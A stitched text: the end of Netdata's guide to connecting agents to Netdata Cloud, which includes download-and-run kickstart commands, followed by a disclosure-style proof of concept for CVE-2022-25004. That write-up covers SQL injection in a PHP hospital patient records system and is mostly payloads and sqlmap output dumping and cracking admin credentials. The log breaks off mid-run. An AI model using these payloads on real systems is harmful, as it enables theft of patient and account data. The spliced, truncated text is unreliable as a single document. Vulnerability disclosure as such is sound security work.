\\\n -e NETDATA_CLAIM_ROOMS=ROOM1,ROOM2 \\\n -e NETDATA_CLAIM_PROXY=PROXY \\\n netdata/netdata\n```\n>Note: This command is suggested for connecting a new container. Using this command for an existing container recreates the container, though data \nand configuration of the old container may be preserved. If you are claiming an existing container that can not be recreated, \nyou can add the container by going to Netdata Cloud, clicking the **Nodes** tab, clicking **Connect Nodes**, selecting **Docker**, and following\nthe instructions and commands provided or by following the instructions in an [empty War Room](#empty-war-room). \n\nThe output that would be seen from the connection process when using other methods will be present in the container logs.\n\nUsing the environment variables like this to handle the connection process is the preferred method of connecting Docker containers\nas it works in the widest variety of situations and simplifies configuration management.\n\n#### Using Docker compose\n\nIf you use `docker compose`, you can copy the config provided by Netdata Cloud, which should be same as the one below:\n\n```bash\nversion: '3'\nservices:\n netdata:\n image: netdata/netdata\n container_name: netdata\n hostname: example.com # set to fqdn of host\n ports:\n - 19999:19999\n restart: unless-stopped\n cap_add:\n - SYS_PTRACE\n security_opt:\n - apparmor:unconfined\n volumes:\n - netdataconfig:/etc/netdata\n - netdatalib:/var/lib/netdata\n - netdatacache:/var/cache/netdata\n - /etc/passwd:/host/etc/passwd:ro\n - /etc/group:/host/etc/group:ro\n - /proc:/host/proc:ro\n - /sys:/host/sys:ro\n - /etc/os-release:/host/etc/os-release:ro\n environment:\n - NETDATA_CLAIM_TOKEN=TOKEN\n - NETDATA_CLAIM_URL=\"https://api.netdata.cloud\"\n - NETDATA_CLAIM_ROOMS=ROOM1,ROOM2\n\nvolumes:\n netdataconfig:\n netdatalib:\n netdatacache:\n```\n\nThen run the following command in the same directory as the `docker-compose.yml` file to start the container.\n\n```bash\ndocker-compose up -d\n```\n#### Using docker exec\n\nConnect a _running Netdata Agent container_, where you don't want to recreate the existing container, append the script offered by Netdata Cloud to a `docker exec ...` command, replacing\n`netdata` with the name of your running container:\n\n```bash\ndocker exec -it netdata netdata-claim.sh -token=TOKEN -rooms=ROOM1,ROOM2 -url=https://api.netdata.cloud\n```\nThe values for `ROOM1,ROOM2` can be found by by going to Netdata Cloud, clicking the **Nodes** tab, clicking **Connect Nodes**, selecting **Docker**, and copying the `rooms=` value in the command provided. \n\nThe script should return `Agent was successfully claimed.`. If the connection process returns errors, or if\nyou don't see the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).\n\n### Connect an agent running in macOS\n\nTo connect a node that is running on a macOS environment the script that will be provided to you by Netdata Cloud is the [kickstart](/packaging/installer/methods/macos.md#install-netdata-with-our-automatic-one-line-installation-script) which will install the Netdata Agent on your node, if it isn't already installed, and connect the node to Netdata Cloud. It should be similar to:\n\n```bash\ncurl https://my-netdata.io/kickstart.sh > /tmp/netdata-kickstart.sh && sh /tmp/netdata-kickstart.sh --install /usr/local/ --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud\n```\nThe script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if you don't see\nthe node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).\n\n### Connect a Kubernetes cluster's parent Netdata pod\n\nRead our [Kubernetes installation](/packaging/installer/methods/kubernetes.md#connect-your-kubernetes-cluster-to-netdata-cloud)\nfor details on connecting a parent Netdata pod.\n\n### Connect through a proxy\n\nA Space's administrator can connect a node through HTTP(S) proxy.\n\nYou should first configure the proxy in the `[cloud]` section of `netdata.conf`. The proxy settings you specify here\nwill also be used to tunnel the ACLK. The default `proxy` setting is `none`.\n\n```conf\n[cloud]\n proxy = none\n```\n\nThe `proxy` setting can take one of the following values:\n\n- `none`: Do not use a proxy, even if the system configured otherwise.\n- `env`: Try to read proxy settings from set environment variables `http_proxy`.\n- `http://[user:pass@]host:ip`: The ACLK and connection process will use the specified HTTP(S) proxy.\n\nFor example, a HTTP proxy setting may look like the following:\n\n```conf\n[cloud]\n proxy = http://203.0.113.0:1080 # With an IP address\n proxy = http://proxy.example.com:1080 # With a URL\n```\n\nYou can now move on to connecting. When you connect with the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) script, add the `--claim-proxy=` parameter and\nappend the same proxy setting you added to `netdata.conf`.\n\n```bash\nwget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh --claim-token TOKEN --claim-rooms ROOM1,ROOM2 --claim-url https://api.netdata.cloud --claim-proxy http://[user:pass@]host:ip\n```\n\nHit **Enter**. The script should return `Agent was successfully claimed.`. If the connecting to Netdata Cloud process returns errors, or if\nyou don't see the node in your Space after 60 seconds, see the [troubleshooting information](#troubleshooting).\n\n### Troubleshooting\n\nIf you're having trouble connecting a node, this may be because the [ACLK](/aclk/README.md) cannot connect to Cloud.\n\nWith the Netdata Agent running, visit `http://NODE:19999/api/v1/info` in your browser, replacing `NODE` with the IP\naddress or hostname of your Agent. The returned JSON contains four keys that will be helpful to diagnose any issues you\nmight be having with the ACLK or connection process.\n\n```json\n\t\"cloud-enabled\"\n\t\"cloud-available\"\n\t\"agent-claimed\"\n\t\"aclk-available\"\n```\n\nOn Netdata agent version `1.32` (`netdata -v` to find your version) and newer, the `netdata -W aclk-state` command can be used to get some diagnostic information about ACLK. Sample output:\n\n```\nACLK Available: Yes\nACLK Implementation: Next Generation\nNew Cloud Protocol Support: Yes\nClaimed: Yes\nClaimed Id: 53aa76c2-8af5-448f-849a-b16872cc4ba1\nOnline: Yes\nUsed Cloud Protocol: New\n```\n\nUse these keys and the information below to troubleshoot the ACLK.\n\n#### kickstart: unsupported Netdata installation\n\nIf you run the kickstart script and get the following error `Existing install appears to be handled manually or through the system package manager.` you most probably installed Netdata using an unsupported package. \n\nIf you are using an unsupported package, such as a third-party `.deb`/`.rpm` package provided by your distribution,\nplease remove that package and reinstall using our [recommended kickstart\nscript](/docs/get-started.mdx#install-on-linux-with-one-line-installer).\n\n#### kickstart: Failed to write new machine GUID\n\nIf you run the kickstart script but don't have privileges required for the actions done on the connecting to Netdata Cloud process you will get the following error:\n\n```bash\nFailed to write new machine GUID. Please make sure you have rights to write to /var/lib/netdata/registry/netdata.public.unique.id.\n```\nFor a successful execution you will need to run the script with root privileges or run it with the user that is running the agent, more details on the [Connect an agent without root privileges](#connect-an-agent-without-root-privileges) section.\n\n#### bash: netdata-claim.sh: command not found\n\nIf you run the claiming script and see a `command not found` error, you either installed Netdata in a non-standard\nlocation or are using an unsupported package. If you installed Netdata in a non-standard path using the `--install`\noption, you need to update your `$PATH` or run `netdata-claim.sh` using the full path. For example, if you installed\nNetdata to `/opt/netdata`, use `/opt/netdata/bin/netdata-claim.sh` to run the claiming script.\n\nIf you are using an unsupported package, such as a third-party `.deb`/`.rpm` package provided by your distribution,\nplease remove that package and reinstall using our [recommended kickstart\nscript](/docs/get-started.mdx#install-on-linux-with-one-line-installer).\n\n#### Connecting on older distributions (Ubuntu 14.04, Debian 8, CentOS 6)\n\nIf you're running an older Linux distribution or one that has reached EOL, such as Ubuntu 14.04 LTS, Debian 8, or CentOS\n6, your Agent may not be able to securely connect to Netdata Cloud due to an outdated version of OpenSSL. These old\nversions of OpenSSL cannot perform [hostname validation](https://wiki.openssl.org/index.php/Hostname_validation), which\nhelps securely encrypt SSL connections.\n\nWe recommend you reinstall Netdata with a [static build](/packaging/installer/methods/kickstart.md#static-builds), which uses an\nup-to-date version of OpenSSL with hostname validation enabled.\n\nIf you choose to continue using the outdated version of OpenSSL, your node will still connect to Netdata Cloud, albeit\nwith hostname verification disabled. Without verification, your Netdata Cloud connection could be vulnerable to\nman-in-the-middle attacks.\n\n#### cloud-enabled is false\n\nIf `cloud-enabled` is `false`, you probably ran the installer with `--disable-cloud` option.\n\nAdditionally, check that the `enabled` setting in `var/lib/netdata/cloud.d/cloud.conf` is set to `true`:\n\n```conf\n[global]\n enabled = true\n```\n\nTo fix this issue, reinstall Netdata using your [preferred method](/packaging/installer/README.md) and do not add the\n`--disable-cloud` option.\n\n#### cloud-available is false / ACLK Available: No\n\nIf `cloud-available` is `false` after you verified Cloud is enabled in the previous step, the most likely issue is that\nCloud features failed to build during installation.\n\nIf Cloud features fail to build, the installer continues and finishes the process without Cloud functionality as opposed\nto failing the installation altogether. We do this to ensure the Agent will always finish installing.\n\nIf you can't see an explicit error in the installer's output, you can run the installer with the `--require-cloud`\noption. This option causes the installation to fail if Cloud functionality can't be built and enabled, and the\ninstaller's output should give you more error details.\n\nYou may see one of the following error messages during installation:\n\n- Failed to build libmosquitto. The install process will continue, but you will not be able to connect this node to\n Netdata Cloud.\n- Unable to fetch sources for libmosquitto. The install process will continue, but you will not be able to connect\n this node to Netdata Cloud.\n- Failed to build libwebsockets. The install process will continue, but you may not be able to connect this node to\n Netdata Cloud.\n- Unable to fetch sources for libwebsockets. The install process will continue, but you may not be able to connect\n this node to Netdata Cloud.\n- Could not find cmake, which is required to build libwebsockets. The install process will continue, but you may not\n be able to connect this node to Netdata Cloud.\n- Could not find cmake, which is required to build JSON-C. The install process will continue, but Netdata Cloud\n support will be disabled.\n- Failed to build JSON-C. Netdata Cloud support will be disabled.\n- Unable to fetch sources for JSON-C. Netdata Cloud support will be disabled.\n\nOne common cause of the installer failing to build Cloud features is not having one of the following dependencies on\nyour system: `cmake`, `json-c` and `OpenSSL`, including corresponding `devel` packages.\n\nYou can also look for error messages in `/var/log/netdata/error.log`. Try one of the following two commands to search\nfor ACLK-related errors.\n\n```bash\nless /var/log/netdata/error.log\ngrep -i ACLK /var/log/netdata/error.log\n```\n\nIf the installer's output does not help you enable Cloud features, contact us by [creating an issue on\nGitHub](https://github.com/netdata/netdata/issues/new?assignees=&labels=bug%2Cneeds+triage&template=BUG_REPORT.yml&title=The+installer+failed+to+prepare+the+required+dependencies+for+Netdata+Cloud+functionality)\nwith details about your system and relevant output from `error.log`.\n\n#### agent-claimed is false / Claimed: No\n\nYou must [connect your node](#how-to-connect-a-node).\n\n#### aclk-available is false / Online: No\n\nIf `aclk-available` is `false` and all other keys are `true`, your Agent is having trouble connecting to the Cloud\nthrough the ACLK. Please check your system's firewall.\n\nIf your Agent needs to use a proxy to access the internet, you must [set up a proxy for\nconnecting](#connect-through-a-proxy).\n\nIf you are certain firewall and proxy settings are not the issue, you should consult the Agent's `error.log` at\n`/var/log/netdata/error.log` and contact us by [creating an issue on\nGitHub](https://github.com/netdata/netdata/issues/new?assignees=&labels=bug%2Cneeds+triage&template=BUG_REPORT.yml&title=ACLK-available-is-false)\nwith details about your system and relevant output from `error.log`.\n\n### Remove and reconnect a node\n\nTo remove a node from your Space in Netdata Cloud, delete the `cloud.d/` directory in your Netdata library directory.\n\n```bash\ncd /var/lib/netdata # Replace with your Netdata library directory, if not /var/lib/netdata/\nsudo rm -rf cloud.d/\n```\n\nThis node no longer has access to the credentials it was used when connecting to Netdata Cloud via the ACLK.\nYou will still be able to see this node in your War Rooms in an **unreachable** state.\n\nIf you want to reconnect this node, you need to:\n1. Ensure that the `/var/lib/netdata/cloud.d` directory doesn't exist. In some installations, the path is `/opt/netdata/var/lib/netdata/cloud.d`.\n2. Stop the agent.\n3. Ensure that the `uuidgen-runtime` package is installed. Run ```echo \"$(uuidgen)\"``` and validate you get back a UUID.\n4. Copy the kickstart.sh command to add a node from your space and add to the end of it `--claim-id \"$(uuidgen)\"`. Run the command and look for the message `Node was successfully claimed.`\n5. Start the agent\n\n\n## Connecting reference\nIn the sections below, you can find reference material for the kickstart script, claiming script, connecting via the Agent's command line\ntool, and details about the files found in `cloud.d`.\n\n### The `cloud.conf` file\n\nThis section defines how and whether your Agent connects to [Netdata Cloud](https://learn.netdata.cloud/docs/cloud/)\nusing the [ACLK](/aclk/README.md).\n\n| setting | default | info |\n|:-------------- |:------------------------- |:-------------------------------------------------------------------------------------------------------------------------------------- |\n| cloud base url | https://api.netdata.cloud | The URL for the Netdata Cloud web application. You should not change this. If you want to disable Cloud, change the `enabled` setting. |\n| enabled | yes | The runtime option to disable the [Agent-Cloud link](/aclk/README.md) and prevent your Agent from connecting to Netdata Cloud. |\n\n### kickstart script\n\nThe best way to install Netdata and connect your nodes to Netdata Cloud is with our automatic one-line installation script, [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script). This script will install the Netdata Agent, in case it isn't already installed, and connect your node to Netdata Cloud. \n\nThis works with:\n* most Linux distributions, see [Netdata's platform support policy](/packaging/PLATFORM_SUPPORT.md)\n* macOS\n\nFor details on how to run this script please check [How to connect a node](#how-to-connect-a-node) and choose your environment.\n\nIn case Netdata Agent is already installed and you run this script to connect a node to Netdata Cloud it will not upgrade your agent automatically. If you also want to upgrade the Agent installation you'll need to run the script again without the connection options. \n\nOur suggestion is to first run kickstart to upgrade your agent by running the command below and the run the [How to connect a node]\n(#how-to-connect-a-node).\n\n**Linux**\n\n```bash\nwget -O /tmp/netdata-kickstart.sh https://my-netdata.io/kickstart.sh && sh /tmp/netdata-kickstart.sh\n```\n\n**macOS**\n\n```bash\ncurl https://my-netdata.io/kickstart.sh > /tmp/netdata-kickstart.sh && sh /tmp/netdata-kickstart.sh --install /usr/local/\n```\n### Claiming script\n\nA Space's administrator can also connect an Agent by directly calling the `netdata-claim.sh` script either with root privileges\nusing `sudo`, or as the user running the Agent (typically `netdata`), and passing the following arguments:\n\n```sh\n-token=TOKEN\n where TOKEN is the Space's claiming token.\n-rooms=ROOM1,ROOM2,...\n where ROOMX is the War Room this node should be added to. This list is optional.\n-url=URL_BASE\n where URL_BASE is the Netdata Cloud endpoint base URL. By default, this is https://api.netdata.cloud.\n-id=AGENT_ID\n where AGENT_ID is the unique identifier of the Agent. This is the Agent's MACHINE_GUID by default.\n-hostname=HOSTNAME\n where HOSTNAME is the result of the hostname command by default.\n-proxy=PROXY_URL\n where PROXY_URL is the endpoint of a HTTP or HTTPS proxy.\n```\n\nFor example, the following command connects an Agent and adds it to rooms `room1` and `room2`:\n\n```sh\nnetdata-claim.sh -token=MYTOKEN1234567 -rooms=room1,room2\n```\n\nYou should then update the `netdata` service about the result with `netdatacli`:\n\n```sh\nnetdatacli reload-claiming-state\n```\n\nThis reloads the Agent connection state from disk.\n\nOur recommendation is to trigger the connection process using the [kickstart](/packaging/installer/README.md#automatic-one-line-installation-script) whenever possible.\n\n### Netdata Agent command line\n\nIf a Netdata Agent is running, the Space's administrator can connect a node using the `netdata` service binary with\nadditional command line parameters:\n\n```sh\n-W \"claim -token=TOKEN -rooms=ROOM1,ROOM2\"\n```\n\nFor example:\n\n```sh\n/usr/sbin/netdata -D -W \"claim -token=MYTOKEN1234567 -rooms=room1,room2\"\n```\n\nIf need be, the user can override the Agent's defaults by providing additional arguments like those described\n[here](#claiming-script).\n\n### Connection directory\n\nNetdata stores the Agent's connection-related state in the Netdata library directory under `cloud.d`. For a default\ninstallation, this directory exists at `/var/lib/netdata/cloud.d`. The directory and its files should be owned by the\nuser that runs the Agent, which is typically the `netdata` user.\n\nThe `cloud.d/token` file should contain the claiming-token and the `cloud.d/rooms` file should contain the list of War\nRooms you added that node to.\n\nThe user can also put the Cloud endpoint's full certificate chain in `cloud.d/cloud_fullchain.pem` so that the Agent\ncan trust the endpoint if necessary.\n\n\n"}}},{"rowIdx":546,"cells":{"text":{"kind":"string","value":"## [CVE-2022-25004](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25004)\n\n## [Software](https://www.sourcecodester.com/php/15116/hospitals-patient-records-management-system-php-free-source-code.html)\n\n![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/2022/CVE-2022-25004/Docs/Screenshot%202022-03-01%20095004.png)\n\n\n## Description:\nHospital Patient Record Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter in /patients/view_patient.php.\nThe `id` parameter from Hospital Patient Record Management System v1.0 appears to be vulnerable to SQL injection attacks. \nThe attacker can take administrator account control and also of all accounts on this system, also the malicious user can download all information about this system.\n\nStatus: CRITICAL\n\n\n## Vulnerable code:\n\n```php\nquery(\"SELECT * FROM `patient_list` where id = '{$_GET['id']}'\");\n if($qry->num_rows > 0){\n $res = $qry->fetch_array();\n foreach($res as $k => $v){\n if(!is_numeric($k))\n $$k = $v;\n }\n\n $details = $conn->query(\"SELECT * FROM `patient_details` where patient_id ='{$id}' \");\n while($row = $details->fetch_assoc()){\n ${$row['meta_field']} = $row['meta_value'];\n }\n }else{\n echo \"\";\n }\n}else{\n echo \"\";\n}\n\n$doctors_arr = [];\n$doctors_qry = $conn->query(\"SELECT * FROM `doctor_list` where id in (SELECT doctor_id FROM `patient_history` where patient_id ='{$id}') \");\nif($doctors_qry->num_rows > 0)\n$doctors_arr = array_column($doctors_qry->fetch_all(MYSQLI_ASSOC),'fullname','id');\n\n$room_arr = [];\n$room_qry = $conn->query(\"SELECT * FROM `room_list` where id in (SELECT room_id FROM `admission_history` where patient_id ='{$id}') \");\nif($room_qry->num_rows > 0)\n$room_arr = array_column($room_qry->fetch_all(MYSQLI_ASSOC),'name','id');\n?>\n```\n\n[+] Payloads:\n\n```mysql\n---\nParameter: id (GET)\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 4214 FROM (SELECT(SLEEP(5)))YwrA)-- gsSe&page=patients/view_patient\n---\n\n```\n\n## All in one:\n\n```mysql\n\nPS C:\\Users\\venvaropt\\Desktop\\CVE-2022-25003> python .\\PoC-SQL-automation-all-in-one.py\nSQL - Injecting for parameter 'id' in view_doctors.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 11:57:34 /2022-03-01/\n\n[11:57:34] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=blov3a6cmm7...5ljvdr4pu6'). Do you want to use those [Y/n] Y\nsqlmap resumed the following injection point(s) from stored session:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 1807=1807 AND 'uYTA'='uYTA\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 6423 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(6423=6423,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'KEjB'='KEjB\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 3271 FROM (SELECT(SLEEP(3)))ySPv) AND 'vkzK'='vkzK\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 8 columns\n Payload: id=-5548' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717071,0x71687362656d5a76494d674d5741614e7542625946744c6c5370416b486e7374717953684d687950,0x71716a7671),NULL,NULL,NULL,NULL,NULL-- -\n---\n[11:57:35] [INFO] testing MySQL\n[11:57:35] [INFO] confirming MySQL\n[11:57:35] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache 2.4.52, PHP, PHP 8.1.2\nback-end DBMS: MySQL >= 5.0.0 (MariaDB fork)\n[11:57:35] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[11:57:35] [INFO] resumed: '0192023a7bbd73250516f069df18b500','admin'\n[11:57:35] [INFO] resumed: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[11:57:35] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[11:57:35] [INFO] using hash method 'md5_generic_passwd'\n[11:57:35] [INFO] resuming password 'admin123' for hash '0192023a7bbd73250516f069df18b500' for user 'admin'\n[11:57:35] [INFO] resuming password 'stupid123' for hash '97a8afcf419cc231e1bdcd8584b0a246' for user 'cblake'\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[11:57:35] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[11:57:35] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 11:57:35 /2022-03-01/\n\nSQL - Injecting for parameter 'id' in manage_doctor.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e e88~~\\ 888 888 888-~\\ ,d888 _d88__ Y88b /\n888 888 888 888 888 888 C888 d888 88b d888 888 888 888 888 888 Y888/\n888 888 888 888 888 888 Y88b 8888__888 8888 888 888 888 888 888 Y8/\n888 888 888 888 888 888 888D Y888 , Y888 888 888 888 888 888 Y\n888 888 \"88_-888 888 888 \\_88P \"88___/ \"88__/ \"88_-888 888 888 \"88_/ /\n _/\n {1.6.1.2#dev}\n https://sqlmap.org\n https://www.nu11secur1ty.com/\n\n[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\n\n[*] starting @ 11:57:39 /2022-03-01/\n\n[11:57:39] [INFO] testing connection to the target URL\nyou have not declared cookie(s), while server wants to set its own ('PHPSESSID=fgqostf9v6a...c07feq0430'). Do you want to use those [Y/n] Y\n[11:57:39] [INFO] checking if the target is protected by some kind of WAF/IPS\n[11:57:40] [INFO] testing if the target URL content is stable\n[11:57:40] [INFO] target URL content is stable\n[11:57:40] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')\n[11:57:40] [INFO] testing for SQL injection on GET parameter 'id'\nfor the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y\n[11:57:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'\n[11:57:40] [WARNING] reflective value(s) found and filtering out\n[11:57:41] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string=\"Physical medicine and rehabilitation\")\n[11:57:41] [INFO] testing 'Generic inline queries'\n[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'\n[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'\n[11:57:41] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'\n[11:57:41] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'\n[11:57:41] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'\n[11:57:41] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'\n[11:57:41] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'\n[11:57:41] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'\n[11:57:41] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'\n[11:57:41] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable\n[11:57:41] [INFO] testing 'MySQL inline queries'\n[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'\n[11:57:41] [WARNING] time-based comparison requires larger statistical model, please wait...... (done)\n[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'\n[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'\n[11:57:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'\n[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'\n[11:57:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'\n[11:57:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'\n[11:57:47] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable\n[11:57:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'\n[11:57:47] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found\n[11:57:48] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test\n[11:57:48] [INFO] target URL appears to have 8 columns in query\n[11:57:48] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable\nGET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N\nsqlmap identified the following injection point(s) with a total of 61 HTTP(s) requests:\n---\nParameter: id (GET)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: id=1' AND 3060=3060 AND 'WBCY'='WBCY\n\n Type: error-based\n Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)\n Payload: id=1' AND (SELECT 3263 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(3263=3263,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZQSU'='ZQSU\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: id=1' AND (SELECT 9794 FROM (SELECT(SLEEP(3)))mBlw) AND 'oVQB'='oVQB\n\n Type: UNION query\n Title: Generic UNION query (NULL) - 8 columns\n Payload: id=-5127' UNION ALL SELECT CONCAT(0x717a706a71,0x76436c4774624e78647045456f474773684944566f594345496f547a7146686e6477744e49516b51,0x71766a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -\n---\n[11:57:48] [INFO] the back-end DBMS is MySQL\nweb application technology: Apache 2.4.52, PHP, PHP 8.1.2\nback-end DBMS: MySQL >= 5.0 (MariaDB fork)\n[11:57:48] [INFO] fetching entries of column(s) 'password,username' for table 'users' in database 'hprms_db'\n[11:57:49] [INFO] retrieved: '0192023a7bbd73250516f069df18b500','admin'\n[11:57:49] [INFO] retrieved: '97a8afcf419cc231e1bdcd8584b0a246','cblake'\n[11:57:49] [INFO] recognized possible password hashes in column 'password'\ndo you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N\ndo you want to crack them via a dictionary-based attack? [Y/n/q] Y\n[11:57:49] [INFO] using hash method 'md5_generic_passwd'\nwhat dictionary do you want to use?\n[1] default dictionary file 'C:\\Users\\venvaropt\\Desktop\\CVE\\sqlmap\\data\\txt\\wordlist.tx_' (press Enter)\n[2] custom dictionary file\n[3] file with list of dictionary files\n> Y\n[11:57:49] [INFO] using default dictionary\ndo you want to use common password suffixes? (slow!) [y/N] N\n[11:57:49] [INFO] starting dictionary-based cracking (md5_generic_passwd)\n[11:57:49] [INFO] starting 4 processes\n[11:57:54] [INFO] cracked password 'admin123' for user 'admin'\n[cblake11:58:04'8:04INFO] [] current status: affac... |INFO] cracked password 'stupid123' for user '\n[11:58:07] [INFO] current status: brawl... \\\n[11:58:07] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)\nDatabase: hprms_db\nTable: users\n[2 entries]\n+----------+----------------------------------------------+\n| username | password |\n+----------+----------------------------------------------+\n| admin | 0192023a7bbd73250516f069df18b500 (admin123) |\n| cblake | 97a8afcf419cc231e1bdcd8584b0a246 (stupid123) |\n+----------+----------------------------------------------+\n\n[11:58:07] [INFO] table 'hprms_db.users' dumped to CSV file 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost\\dump\\hprms_db\\users.csv'\n[11:58:07] [INFO] fetched data logged to text files under 'C:\\Users\\venvaropt\\AppData\\Local\\sqlmap\\output\\localhost'\n\n[*] ending @ 11:58:07 /2022-03-01/\n\nTraceback (most recent call last):\n File \"C:\\Users\\venvaropt\\Desktop\\CVE-2022-25003\\PoC-SQL-automation-all-in-one.py\", line 26, in \n os.system('python C:\\\\Users\\\\venvaropt\\\\Desktop\\\\CVE\\\\sqlmap\\\\sqlmap.py -u http://localhost/hprms/admin/doctors/manage_doctor.php?id=1 -p id --time-sec 3 --dbms=mysql --batch --answers=\"crack=Y,dict=Y,continue=Y,quit=N\" -D hprms_db -T users -C username,password --dump')\nKeyboardInterrupt\nPS C:\\Users\\venvaropt\\Desktop\\CVE-2022-25003>\nPS C:\\Users\\venvaropt\\Desktop\\CVE-2022-25003> python .\\PoC-SQL-automation-all-in-one.py\nSQL - Injecting for parameter 'id' in view_doctors.php app\n\n ,d d ,d d8\n888-~88e 888 888 ,d888 ,d888 d88~\\ e88~~8e 